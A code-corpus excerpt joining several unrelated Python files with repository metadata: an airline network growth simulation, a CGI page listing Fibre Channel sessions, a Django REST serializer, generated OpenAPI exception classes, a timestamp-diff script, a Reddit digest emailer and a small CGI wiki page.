    For every directed edge the stored ``duration`` (seconds) is divided by
    the great-circle distance between its endpoint airports; the mean of
    these ratios is returned.  Self-loops are skipped, as are routes whose
    airport coordinates are missing or invalid.

    :raises ZeroDivisionError: if no route yields a valid ratio.
    """
    durations_per_km = []
    for from_airport in network.nodes():
        for f, t, k in network.out_edges(from_airport, keys=True):
            # Self-loops have zero distance; skip them.
            if f == t:
                continue
            from_data = network.nodes[f]
            to_data = network.nodes[t]
            try:
                dist = calculate_distance_from_coordinates(
                    from_data.get('latitude'),
                    from_data.get('longitude'),
                    to_data.get('latitude'),
                    to_data.get('longitude'),
                )
            except Exception:
                # Missing/invalid coordinates: ignore this route.  Was a bare
                # ``except:``, which also swallowed KeyboardInterrupt/SystemExit.
                continue
            flight_time = network.edges[f, t, k].get('duration')
            durations_per_km.append(flight_time / dist)
    return sum(durations_per_km) / len(durations_per_km)
def calculate_hub_attachment_likelihood(network: nx.MultiDiGraph, from_airport, to_airport):
    """Likelihood of attaching a new link between two airports, favouring hubs.

    Blends a uniform component (weight 0.5) with a preferential component
    proportional to the number of existing links between the two airports
    (counted in both directions), normalised by ``from_airport``'s out-degree.
    """
    random_weight = 0.5
    out_degree = len(network.out_edges(from_airport))
    existing_links = 0
    # Count parallel edges in both directions between the pair.
    for src, dst in ((from_airport, to_airport), (to_airport, from_airport)):
        edge_data = network.get_edge_data(src, dst)
        if edge_data:
            existing_links += len(edge_data)
    uniform_part = random_weight * 1 / network.number_of_nodes()
    preferential_part = (1 - random_weight) * existing_links / (1 + out_degree)
    return uniform_part + preferential_part
def calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport):
    """Attachment likelihood for two airports that share at least one hub.

    Combines a uniform component (weight 0.2) with a component that grows
    with the relative strength of the strongest shared hub and decays with
    the 5th power of the number of already-existing direct routes between
    the pair.  With no shared hub only the uniform component is returned.
    """
    p = 0.2
    # Hubs reachable from both endpoints (shared out-neighbours).
    from_neighbors = set([t for f, t, k in network.out_edges(from_airport, keys=True)])
    to_neighbors = set([t for f, t, k in network.out_edges(to_airport, keys=True)])
    common_hubs = from_neighbors.intersection(to_neighbors)
    random_connectivity = p * 1/network.number_of_nodes()
    if len(common_hubs) == 0:
        return random_connectivity
    all_to_hub_strengths = []
    for common_hub in common_hubs:
        # Strength of a hub = number of parallel links (both directions)
        # between from_airport and that hub.
        num_links1 = network.get_edge_data(from_airport, common_hub)
        num_links1 = len(num_links1) if num_links1 else 0
        num_links2 = network.get_edge_data(common_hub, from_airport)
        num_links2 = len(num_links2) if num_links2 else 0
        all_to_hub_strengths.append((
            num_links1 + num_links2,
            common_hub
        ))
    # Take the strongest shared hub.
    strength, strongest_hub = sorted(all_to_hub_strengths, key=lambda hn: hn[0], reverse=True)[0]
    existing_direct_routes1 = network.get_edge_data(from_airport, to_airport)
    existing_direct_routes1 = len(existing_direct_routes1) if existing_direct_routes1 else 0
    existing_direct_routes2 = network.get_edge_data(to_airport, from_airport)
    existing_direct_routes2 = len(existing_direct_routes2) if existing_direct_routes2 else 0
    existing_direct_routes = existing_direct_routes1 + existing_direct_routes2
    # Strong penalty (power 5) for pairs that already have direct routes,
    # scaled by the strongest hub's share of all shared-hub strength.
    neighbor_connectivity = (1-p) * (1 / ((1 + existing_direct_routes)**5)) * (strength / sum([s[0] for s in all_to_hub_strengths]))
    return random_connectivity + neighbor_connectivity
def calculate_non_hub_connectivity(network: nx.MultiDiGraph, from_airport, to_airport):
    """Attachment likelihood that penalises well-connected destinations.

    A small uniform component (weight 0.2) plus a term that decays with the
    square of ``to_airport``'s degree, so low-degree (non-hub) airports are
    preferred.  ``from_airport`` does not influence the score.
    """
    uniform_weight = 0.2
    uniform_part = uniform_weight * 1 / network.number_of_nodes()
    degree_penalty = (network.degree(to_airport) + 1) ** 2
    return uniform_part + (1 - uniform_weight) * 1 / degree_penalty
def grow_traffic_by_x_years(network: nx.MultiDiGraph, years, growth_rate, duration_per_km, preferential_attachment=None):
    """Grow the flight network in place by simulating *years* of traffic growth.

    The target edge count is ``num_edges * growth_rate**years``; the missing
    edges are distributed over airport pairs, either unconditionally or
    filtered by a preferential-attachment strategy ('HUB', 'NEIGHBOR' or
    'NONHUB').  Progress is written to stdout.  Returns None.
    """
    num_of_edges = len(network.edges)
    prospect_num_of_edges = num_of_edges * (growth_rate**years)
    num_additional_edges = int(prospect_num_of_edges) - num_of_edges
    # Cache of pairwise great-circle distances, keyed by airport.
    DIST_CACHE = {}
    num_distributed_new_edges = 0
    # Keep sweeping all airport pairs until enough new edges were added.
    while num_distributed_new_edges < num_additional_edges:
        for fn, from_airport in enumerate(network.nodes()):
            if num_distributed_new_edges >= num_additional_edges:
                return
            sys.stdout.write('\rDistributed: {} of {} new links'.format(num_distributed_new_edges, num_additional_edges))
            for to_airport in network.nodes():
                if num_distributed_new_edges >= num_additional_edges:
                    return
                # Avoid connections to self
                if from_airport == to_airport:
                    continue
                # Probabilistically skip the pair according to the chosen
                # attachment strategy.
                if preferential_attachment == 'HUB':
                    p = calculate_hub_attachment_likelihood(network, from_airport, to_airport)
                    if random() > p:
                        continue
                elif preferential_attachment == 'NEIGHBOR':
                    p = calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport)
                    # sys.stdout.write('\rP: {}'.format(p))
                    if random() > p:
                        continue
                elif preferential_attachment == 'NONHUB':
                    p = calculate_non_hub_connectivity(network, from_airport, to_airport)
                    # sys.stdout.write('\rP: {}'.format(p))
                    if random() > p:
                        continue
                from_airport_obj = network.nodes[from_airport]
                to_airport_obj = network.nodes[to_airport]
                # Check existing connections between the airports.
                # If there are any, we can just use their flight duration.
                # NOTE(review): the second clause below reads
                # ``ef == to_airport and et == to_airport`` (a self-loop);
                # presumably ``et == from_airport`` (reverse direction) was
                # intended - confirm before relying on this branch.
                for ef, et, ek in network.out_edges([from_airport, to_airport], keys=True):
                    if ef == from_airport and et == to_airport or ef == to_airport and et == to_airport:
                        flight_duration_in_min = network.edges[ef, et, ek].get('duration')
                        break
                # If no connections exist yet
                else:
                    distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
                    if distance is None:
                        distance = calculate_distance_from_coordinates(
                            lat1=from_airport_obj.get('latitude'),
                            lng1=from_airport_obj.get('longitude'),
                            lat2=to_airport_obj.get('latitude'),
                            lng2=to_airport_obj.get('longitude')
                        )
                        # NOTE(review): setdefault only stores the inner dict
                        # when the airport key is absent, so later distances
                        # for an already-seen airport are never cached.
                        DIST_CACHE.setdefault(from_airport, {to_airport: distance})
                        DIST_CACHE.setdefault(to_airport, {from_airport: distance})
                    flight_duration_in_min = int(distance * duration_per_km / 60)
                # Random departure time between 05:00 and 19:55 in 5-minute
                # steps, localised to the departure airport's timezone and
                # then converted to the local system timezone.
                utc_dep_time = datetime.strptime('{}:{}:00'.format(5 + int(15 * random()), int(12*random()) * 5), '%H:%M:%S').replace(
                    tzinfo=gettz(network.nodes[from_airport].get('timezone'))).astimezone()
                utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
                network.add_edge(from_airport, to_airport, **{
                    'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
                    'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
                    'duration': flight_duration_in_min * 60
                })
                num_distributed_new_edges += 1
def create_flight_departures_arrivals_index(network) -> Tuple[Dict, Dict]:
    """
    Creates two indices where arrivals and departures are collected by minute.
    This helps to prevent the simulation from analyzing all flights for every
    simulation step (minute) and thus reduces total simulation time greatly.

    :param network: graph whose edges carry 'departureTimeUTC' and
        'arrivalTimeUTC' time strings (parsed with dateutil).
    :return: (departures, arrivals) - each maps a minute-of-day (0..1439) to
        a dict keyed by '{from}{to}{key}' holding (edge_data, from, to).
    """
    dep_index = {}
    arr_index = {}
    # (A dead 'ins' debug counter was removed from this loop.)
    for node in network.nodes():
        for f, t, k in network.out_edges(node, keys=True):
            outbound_flight_data = network.edges[f, t, k]
            scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
            # Collapse the time of day into a minute index within the day.
            scheduled_departure_utc = scheduled_departure_utc.hour * 60 + scheduled_departure_utc.minute
            dep_index.setdefault(scheduled_departure_utc, {}).setdefault(
                '{}{}{}'.format(f, t, k),
                (outbound_flight_data, f, t)
            )
        for f, t, k in network.in_edges(node, keys=True):
            inbound_flight_data = network.edges[f, t, k]
            scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
            scheduled_arrival_utc = scheduled_arrival_utc.hour * 60 + scheduled_arrival_utc.minute
            arr_index.setdefault(scheduled_arrival_utc, {}).setdefault(
                '{}{}{}'.format(f, t, k),
                (inbound_flight_data, f, t)
            )
    return dep_index, arr_index
def create_airport_capacity_load_index(network, capacity_factor=1.2):
    """Derive a per-airport capacity estimate and an (initially zero) load map.

    For each airport, flights are bucketed by the hour of their scheduled
    departure/arrival; the busiest hour's movement count, scaled by
    ``capacity_factor``, becomes the airport's capacity.

    :param network: graph whose edges carry 'departureTimeUTC' and
        'arrivalTimeUTC' time strings (parsed with dateutil).
    :param capacity_factor: headroom multiplier applied to the peak hour.
    :return: (cap_index, load_index) - capacity per airport and a load map
        initialised to 0 for every airport.
    """
    cap_index = {}
    load_index = {}
    # (Leftover debug prints for airport id '9908' were removed.)
    for airport in network.nodes():
        cap_index.setdefault(airport, {})
        for f, t, k in network.out_edges(airport, keys=True):
            outbound_flight_data = network.edges[f, t, k]
            scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
            cap_index[airport].setdefault(scheduled_departure_utc.hour, 0)
            cap_index[airport][scheduled_departure_utc.hour] += 1
        for f, t, k in network.in_edges(airport, keys=True):
            inbound_flight_data = network.edges[f, t, k]
            scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
            cap_index[airport].setdefault(scheduled_arrival_utc.hour, 0)
            cap_index[airport][scheduled_arrival_utc.hour] += 1
        # Peak number of movements in any single hour (0 for isolated airports).
        max_cap = max(cap_index[airport].values()) if cap_index[airport].values() else 0
        cap_index[airport] = capacity_factor * max_cap
        load_index[airport] = 0
    return cap_index, load_index
def transform_to_random(network, duration_per_km=4.5):
    """Return a new MultiDiGraph with the same nodes but randomised edges.

    Every edge of the input network is replaced by an edge between two
    distinct, uniformly chosen airports; the original departure time is kept
    and the duration/arrival time are recomputed from the new pair's
    great-circle distance.

    :param duration_per_km: flight seconds per kilometre used to derive the
        new durations.
    """
    transformed = nx.MultiDiGraph()
    all_nodes_keys = list(network.nodes().keys())
    num_edges = len(network.edges)
    num_edges_added = 0
    # Cache of pairwise great-circle distances, keyed by airport.
    DIST_CACHE = {}
    # Copy all nodes (with their attributes) into the new graph.
    for node in network.nodes():
        transformed.add_node(node, **network.nodes[node])
    for f, t, k in network.edges:
        # Select from and to airport randomly (rejecting self-loops).
        from_airport = to_airport = -1
        while from_airport == to_airport:
            from_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
            to_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
        from_airport_obj = network.nodes[from_airport]
        to_airport_obj = network.nodes[to_airport]
        # Calculate distance and flight duration between them
        distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
        if distance is None:
            distance = calculate_distance_from_coordinates(
                lat1=from_airport_obj.get('latitude'),
                lng1=from_airport_obj.get('longitude'),
                lat2=to_airport_obj.get('latitude'),
                lng2=to_airport_obj.get('longitude')
            )
            # NOTE(review): setdefault only stores the inner dict when the
            # airport key is absent, so later distances for an already-seen
            # airport are never cached.
            DIST_CACHE.setdefault(from_airport, {to_airport: distance})
            DIST_CACHE.setdefault(to_airport, {from_airport: distance})
        flight_duration_in_min = int(distance * duration_per_km / 60)
        # Keep the original flight's departure time.
        utc_dep_time = parser.parse(network.edges[f, t, k]['departureTimeUTC'])
        # Calculate arrival time
        utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
        # Add flight to new network
        transformed.add_edge(
            from_airport,
            to_airport,
            **{
                'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
                'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
                'duration': flight_duration_in_min * 60
            }
        )
        num_edges_added += 1
    return transformed
| [
"samworks@gmx.net"
] | samworks@gmx.net |
7054d92c14a1e6c568fc15281f3341cce89ae817 | 4c2136ab05913beba890b4127c2f608be4798ed2 | /(0, '')/py/fc_session.py | 751c6d3892c8e00fd0baf22a85673c65224e1427 | [] | no_license | Dyutee/test | 345adcd1769cba0f468090bcc311f4d379ea5f1e | b8b3718922bafbac1bad3802f6c885d777e1bb08 | refs/heads/master | 2021-01-12T04:19:45.511927 | 2016-12-29T07:25:29 | 2016-12-29T07:25:29 | 77,588,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/python
# CGI page (Python 2 print statements) for the NAS web UI: renders the
# "FC Session" tab, listing each Fibre Channel target and the client
# sessions currently connected to it.
import cgitb, sys, header, common_methods
cgitb.enable()
sys.path.append('/var/nasexe/storage')
import storage_op
import sys,os
from lvm_infos import *
from functions import *
import san_disk_funs
# fc_target_status() reports whether FC is enabled; fc_list_targets()
# returns the configured FC targets.
check_fc = san_disk_funs.fc_target_status();
fc_target=san_disk_funs.fc_list_targets()
fc_ip = ''
ses = ''
########### FC Session ##########################
# NOTE(review): 'ses' is overwritten on every iteration, so only the last
# target's session info survives; below it is only used as an "any session
# data" flag before per-target sessions are queried again.
for session_tar in fc_target:
	#print 'Session Target:'+str(session_tar)
	#print '<br/>'
	#print 'Sess Tar:'+str(session_tar)
	#print '<br/>'
	ses=san_disk_funs.fc_session(session_tar)
	#print 'FC SESSION Info:'+str(sess)
import left_nav
#if (str(check_fc).find("'1'") > 0):
# Render the session table only when the FC service reports targets.
if (check_fc !=[]):
	print
	print """
	<!--Right side body content starts from here-->
	<div class="rightsidecontainer">
	<div class="insidepage-heading">Fc >> <span class="content">Fc Session Information</span></div>
	<!--tab srt-->
	<div class="searchresult-container">
	<div class="infoheader">
	<div id="tabs">
	<ul>
	<li><a href="#tabs-1">Fc Session</a></li>
	</ul>
	<div id="tabs-1">
	<!--form container starts here-->
	<div class="form-container">
	<div class="topinputwrap-heading">Fc Session Information </div>
	<div class="inputwrap">
	<div class="formrightside-content">
	<form name = 'add_info' method = 'POST'>
	<table width = "680" border = "1" cellspacing = "0" cellpadding = "0" name = 'disp_tables' id = 'id_target_info' style ="border-style:ridge;">"""
	print"""<tr style = 'background-color:#999999; font-weight: bold;'>
	<td height = "35px" valign = "middle" style = 'color: #FFF;'>Fc Target</td>
	<td height = "35px" valign = "middle" style = 'color: #FFF;'>Connected Client</td>
	</tr>"""
	#print fc_target
	if(ses !=''):
		# One table row per target, re-querying its sessions.
		for tar_info in fc_target:
			print"""<tr>
			<!--<td class = "table_content" height = "35px" valign = "middle">
			<a href = 'main.php?page=iscsi&act=add_disk_tgt_done&target=<?= $show_targets ?>'><img border = '0' style = 'margin-top: 2px;' src = '../images/add.png' title = 'Add disk to target' /></a>&nbsp;&nbsp;<a href = 'main.php?page=iscsi&act=del_disk_tgt_done&t=<?= $show_targets ?>'><img border = '0' src = '../images/fileclose.png' title = 'Remove disk from target' /></a>&nbsp;&nbsp;<a href = 'get_properties.php?target=<?= $show_targets ?>'><img border = '0' src = '../images/properties.png' title = 'Target properties' /></a>&nbsp;</td>-->
			<td class = "table_content" height = "35px" valign = "middle">"""
			print"""&nbsp;<font color ="darkred"><b>"""+tar_info+"""</b></font>"""
			print """</td>"""
			print"""<td class = "table_content" height = "35px" valign = "middle" style="font-family: Tahoma;text-decoration:blink;">"""
			# Strip the list repr down to a plain comma-separated string
			# (removes [, ] and quote characters).
			sesion_tar =sess=san_disk_funs.fc_session(tar_info)
			replace_sess_nm = str(sesion_tar).replace('[]', '')
			replace_sess_nm1 = str(replace_sess_nm).replace('[', '')
			replace_sess_nm2 = str(replace_sess_nm1).replace(']', '')
			replace_session_name = str(replace_sess_nm2).replace("'", '')
			#print replace_session_name
			if(replace_session_name!=''):
				print"""<font color = 'darkgreen'><b>"""+replace_session_name+"""</b></font></td>"""
			else:
				print """
				<marquee behavior="alternate" direction ="right"><b><font size="3">There is no Session for this client</font></b></marquee>
				</td>
				"""
	else:
		print"""<tr>
		<td colspan = '3' align = 'center' height="50px;">
		<marquee behavior="alternate" direction= "right"><b><font size="5">No Information is available</font></b></marquee>
		</td>
		</tr>"""
	print"""
	</table>
	</form>
	</div>"""
	print"""
	</div>
	</div>
	<!--form container ends here-->
	</div>
	</div>
	</div>
	</div>
	<!--form container ends here-->
	<!--form container starts here-->
	<!--form container ends here-->
	</div>
	<!--Right side body content ends here-->
	</div>
	<!--Footer starts from here-->
	<div class="insidefooter footer_content">&copy; 2013 Opslag FS2</div>
	<!-- Footer ends here-->
	</div>
	<!--inside body wrapper end-->
	</div>"""
else:
	# FC disabled: tell the user where to enable it.
	print "<div style = 'margin-left: auto; margin-right: auto; text-align: center; vertical-align: center; color: darkred; width: 65%; font: 16px Arial;'><br/><br/><br/><b>Check the 'Enable/Disable FC' option in Maintenance -></b><a href= 'main.py?page=sr'><span style='text-decoration:underline;'>Services</span></a>.</div>"
print"""
<!--body wrapper end-->
</body>
</html>
"""
| [
"dyuteemoy46@gmail.com"
] | dyuteemoy46@gmail.com |
d3c0c2a4b226f7e7de023845098715c9f079029c | 6484cdf98189f5f5736950c81a9d8d30e0f0c0db | /notifications/serializers.py | 488db18520ad943f4fc0b50ec121588e37fe25bd | [] | no_license | AlexFrundin/great_app_example | e0e9c91f06bfba76058f3af5b113a9399945bf6c | 23225e7e88f2ee51359d23cac2200b32b8bd6e20 | refs/heads/main | 2023-05-30T15:02:22.035811 | 2021-06-17T06:40:06 | 2021-06-17T06:40:06 | 339,434,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | from rest_framework import serializers
from .models import Notification
# Serializes Notification rows for the notification listing endpoint.
# (The class name typo "Noitifcation" is kept - renaming would break imports.)
class NoitifcationListSerializer(serializers.ModelSerializer):
    # Render timestamps as e.g. "05 Mar 2021" instead of the default ISO format.
    created_on = serializers.DateTimeField(format="%d %b %Y")
    class Meta:
        model = Notification
        fields = (
            'id',
            'refrence_id',
            'event_id',
            'title',
            'message',
            'is_read',
            'is_deleted',
            'created_on')
| [
"aleksey.frundin@gmail.com"
] | aleksey.frundin@gmail.com |
fefa024de214cfeafa5d85b6923b4b92572e46fb | 583c92b827d741f2385560a75de6d125d888be1b | /classics_proxy_client/exceptions.py | 210bd4cd7815f0f358d47f53315b996b6d4cc04d | [] | no_license | kyunghyuncho/classics-proxy-client | 9686e72aae830bfe8072648505419ddc5c18df5a | 5bfaf30106ba5456a5c2787f0cf8a1cacff10a00 | refs/heads/master | 2022-07-01T05:08:22.608264 | 2020-05-11T04:30:45 | 2020-05-11T04:30:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,761 | py | # coding: utf-8
"""
Classics Proxy API
Proxy API for fetching Classic Sino-Korean Literature from various corpora # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
    """Base class for all exceptions raised by this generated OpenAPI client."""
class ApiTypeError(OpenApiException, TypeError):
    def __init__(self, msg, path_to_item=None, valid_classes=None,
                 key_type=None):
        """Raise for type errors detected in API request/response data.

        Args:
            msg (str): the base exception message.

        Keyword Args:
            path_to_item (list): keys and indices leading to the offending
                item, or None if unknown.
            valid_classes (tuple): primitive classes the item should have
                been an instance of, or None if unknown.
            key_type (bool): True when the offending value was a dict key,
                False when it was a dict value or list item, None if unknown.
        """
        self.path_to_item = path_to_item
        self.valid_classes = valid_classes
        self.key_type = key_type
        # Append the location of the bad item when one was supplied.
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiTypeError, self).__init__(msg)
class ApiValueError(OpenApiException, ValueError):
    def __init__(self, msg, path_to_item=None):
        """Raise for invalid values encountered in API request/response data.

        Args:
            msg (str): the base exception message.

        Keyword Args:
            path_to_item (list): keys and indices leading to the offending
                value inside the received data, or None if unknown.
        """
        self.path_to_item = path_to_item
        # Append the location of the bad value when one was supplied.
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiValueError, self).__init__(msg)
class ApiKeyError(OpenApiException, KeyError):
    def __init__(self, msg, path_to_item=None):
        """Raise for missing keys encountered in API request/response data.

        Args:
            msg (str): the base exception message.

        Keyword Args:
            path_to_item (list): keys and indices leading to the missing
                entry inside the received data, or None if unknown.
        """
        self.path_to_item = path_to_item
        # Append the location of the missing key when one was supplied.
        if path_to_item:
            msg = "{0} at {1}".format(msg, render_path(path_to_item))
        super(ApiKeyError, self).__init__(msg)
class ApiException(OpenApiException):
    def __init__(self, status=None, reason=None, http_resp=None):
        """Wrap a failed HTTP response, or a bare status/reason pair.

        When *http_resp* is supplied its status, reason, body and headers
        are captured; otherwise only *status* and *reason* are stored.
        """
        if http_resp:
            self.status = http_resp.status
            self.reason = http_resp.reason
            self.body = http_resp.data
            self.headers = http_resp.getheaders()
        else:
            self.status = status
            self.reason = reason
            self.body = None
            self.headers = None

    def __str__(self):
        """Build a multi-line description of the failed HTTP call."""
        parts = ["({0})\nReason: {1}\n".format(self.status, self.reason)]
        if self.headers:
            parts.append("HTTP response headers: {0}\n".format(self.headers))
        if self.body:
            parts.append("HTTP response body: {0}\n".format(self.body))
        return "".join(parts)
def render_path(path_to_item):
    """Return a string representation of *path_to_item*.

    Integer components are rendered as list indices (``[0]``); all other
    components are rendered as quoted dict keys (``['name']``).
    """
    result = ""
    for pth in path_to_item:
        # On Python 3, six.integer_types == (int,), so checking ``int``
        # directly drops the py2-compat dependency without changing behaviour.
        if isinstance(pth, int):
            result += "[{0}]".format(pth)
        else:
            result += "['{0}']".format(pth)
    return result
| [
"iyi@snapchat.com"
] | iyi@snapchat.com |
a6fd335e1fab30bfd003446f4f96dc56ec322e38 | 0c08d190ebf4ac4469f1e5931171b84916d0ada8 | /Assignment 2/Static Slicing/main.py | a530f3e9d4e7431ada82f1bd3fc7b4aedfe992c5 | [] | no_license | Janahan10/SOFE-3980-Assignments | 95ef56c01c02a1125fcddb1b9ad58b376cf0066f | a2830b4da3f110e82e031384f46a5200809ab154 | refs/heads/main | 2023-03-30T22:15:41.680013 | 2021-03-28T17:42:44 | 2021-03-28T17:42:44 | 343,180,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | #!/usr/bin/python
import sys
def parse(statement, cur_line):
    """Return True if *statement* occurs as a substring of *cur_line*.

    The explicit if/return True/return False of the original collapses to
    the boolean result of the ``in`` test.
    """
    return statement in cur_line
# Read Source.txt and print (with 1-based line numbers) every line that
# contains the slicing criterion given as the first command-line argument.
file = open("Source.txt", "r")
line_number = 1
for line in file:
    if parse(sys.argv[1], line):
        print('line ', line_number, ':', line.strip())
    line_number += 1
file.close()
| [
"janahanravi10@gmail.com"
] | janahanravi10@gmail.com |
5bfc7e94eef873db0f1be62c6ed282820f1cecc0 | 96cba510d390756372ba32ac8e7893db283f1c22 | /index.py | a14f38f37eb6899a16614fb171649c00ea355912 | [] | no_license | tjdnws1201/web2-python | f71f505ced95352eead5ca26d924535fbdc10542 | a4bf85df37ba2f3944dc9c9576580e501e3c0d37 | refs/heads/master | 2021-01-01T13:29:18.457819 | 2020-02-24T16:30:24 | 2020-02-24T16:30:24 | 239,299,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | #!python
print("Content-Type: text/html") # HTML is following
print()
import cgi, os, view, html_sanitizer
sanitizer = html_sanitizer.Sanitizer()
form = cgi.FieldStorage()
# When an 'id' query parameter is present, show that page; otherwise show
# the Welcome page without update/delete controls.
if 'id' in form:
    title = pageId = form["id"].value
    # NOTE(review): pageId comes straight from the query string and is joined
    # into a filesystem path before any sanitising - possible path traversal
    # (e.g. id=../..); consider os.path.basename() or a whitelist.
    description = open('data/'+pageId,'r').read()
    title = sanitizer.sanitize(title)
    description = sanitizer.sanitize(description)
    update_link = '<a href="update.py?id={}">update</a>'.format(pageId)
    delete_action = '''
    <form action="process_delete.py" method="post">
        <input type="hidden" name="pageId" value="{}">
        <input type="submit" value="delete">
    </form>
    '''.format(pageId)
else:
    title = pageId = 'Welcome'
    description = 'Hello, web'
    update_link = ''
    delete_action = ''
# Render the page shell; view.getList() supplies the <li> links for all pages.
print('''<!doctype html>
<html>
<head>
    <title>WEB - WELCOME</title>
    <meta charset="utf-8">
</head>
<body>
    <h1><a href="index.py">WEB</a></h1>
    <ol>
        {listStr}
    </ol>
    <a href="create.py">create</a>
    {update_link}
    {delete_action}
    <h2>{title}</h2>
    <p>{desc}</p>
</body>
</html>'''.format(
    title=title,
    desc=description,
    listStr=view.getList(),
    update_link=update_link,
    delete_action=delete_action)
) | [
"noreply@github.com"
] | tjdnws1201.noreply@github.com |
cafc4911927a1bc3db70b0421caa2bd1947264dc | 5928d9dcf1ff48f5c9d1a491fd170886d4af4b9e | /walltime1s/time_diff.py | 2d35bd10713fac06055fb9354a1c9da5a913e757 | [] | no_license | xyongcn/qemu-tprof | 1ad76dd166eea692487153359c1d61a237eeb42c | 7c30f139e2d662d2bbc6d3a0925053b194f4e3bc | refs/heads/master | 2016-09-05T21:15:59.188610 | 2014-12-15T07:58:06 | 2014-12-15T07:58:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | #!/usr/bin/python
import sys
log=sys.stdin
def get_tusec(p_line):
	"""Parse a "<label>: <sec>, <usec>" line into total microseconds.

	Bug fix: the body previously read the module-level ``line`` variable
	instead of the ``p_line`` argument; every existing call site passes the
	current value of that global, so behaviour there is unchanged, but the
	function now works for any caller.
	"""
	words=p_line.split(":")
	words2=words[1].split(",")
	sec=words2[0].strip()
	usec=words2[1].strip()
	tusec=int(sec)*1000000+int(usec)
	return tusec
# Prime the loop with the first timestamp line from stdin.
line=log.readline()
t1=get_tusec(line)
while True:
	line=log.readline()
	if not line : break
	t2=get_tusec(line)
	#print str(t2)+","+str(t1)+","+str(t2-t1)
	# Deviation of the interval from exactly one second, in milliseconds
	# (Python 2 print statement).
	print (t2-t1-1000000)/1000.0
	t1=t2
| [
"myming@ubuntu-xyong.(none)"
] | myming@ubuntu-xyong.(none) |
cc4ca8bee5f7c9548c5afea6850d0cc031ab24e8 | 4cd5d0ed28ae52277ba904ea70eb9ac234eced0c | /RedditDigest.py | 7072fd945ea5716f6272005fe9da061b6df0fb76 | [] | no_license | LiamHz/AutoPy | b30f672c69fb96e501d3434b28f6dd224546c39f | 9be71fea5e33a8cb715d407d91ea1eced177eca0 | refs/heads/master | 2021-07-08T12:47:02.485285 | 2019-03-06T16:47:37 | 2019-03-06T16:47:37 | 142,188,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | # Send the top posts of the past day from selected subreddits
import praw
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Read user credentials from external file
# (fixed line positions: email creds on lines 2-3, reddit creds 6-7, API 10-11).
f = open("AuthenticationCredentials.txt","r")
lines = f.read().splitlines()
EMAIL_USERNAME = lines[1]
EMAIL_PASSWORD = lines[2]
REDDIT_USERNAME = lines[5]
REDDIT_PASSWORD = lines[6]
API_USERNAME = lines[9]
API_PASSWORD = lines[10]
f.close()
submissions = []
reddit = praw.Reddit(client_id=API_USERNAME,
                     client_secret=API_PASSWORD,
                     password=REDDIT_PASSWORD,
                     username=REDDIT_USERNAME,
                     user_agent='RedditDigest')
# How many posts to send from each subreddit
subredditLimit = 2
# Selected subreddits
subreddits = ['MachineLearning', 'WorldNews', 'Technology', 'Science', 'TodayILearned']
# 'Pics', 'MostBeautiful', 'EarthPorn']
# Build the digest as a flat list of HTML fragments, one <h2> section per
# subreddit with one linked paragraph per top post.
for SR in subreddits:
    count = 1
    subreddit = reddit.subreddit(SR)
    submissions.append(("<h2>{}</h2> \n").format(SR))
    for submission in subreddit.top(time_filter='day', limit=subredditLimit):
        submissions.append("<div> \n")
        submissions.append(("<a href='{}'> \n").format(submission.url))
        submissions.append(("<p>{}</p> \n").format(submission.title))
        submissions.append("</a> \n")
        submissions.append("</div> \n")
        submissions.append("<br class='mobile'> \n")
    submissions.append("<br> \n")
# Email results to self
fromaddr = EMAIL_USERNAME
toaddr = EMAIL_USERNAME
# Create message container
msg = MIMEMultipart('alternative')
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Reddit Digest"
# Plain text version of email
s = ''
formatted_submissions = s.join(submissions)
# HTML version of email
html = """\
<html>
  <head>
    <style>
      @media only screen and (min-width:800px) {{
        .mobile {{display: none !important;}}
      }}
    </style>
  </head>
  <body>
    {}
  </body>
</html>
""".format(formatted_submissions)
# Allow Unicode characters to be emailed
plainText = MIMEText(formatted_submissions.encode('utf-8'), 'plain', 'UTF-8')
html = MIMEText(html, 'html')
msg.attach(plainText)
msg.attach(html)
# Send via Gmail's SMTP server with STARTTLS.
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, EMAIL_PASSWORD)
server.sendmail(fromaddr, toaddr, msg.as_string())
server.quit()
| [
"liam.hinzman@gmail.com"
] | liam.hinzman@gmail.com |
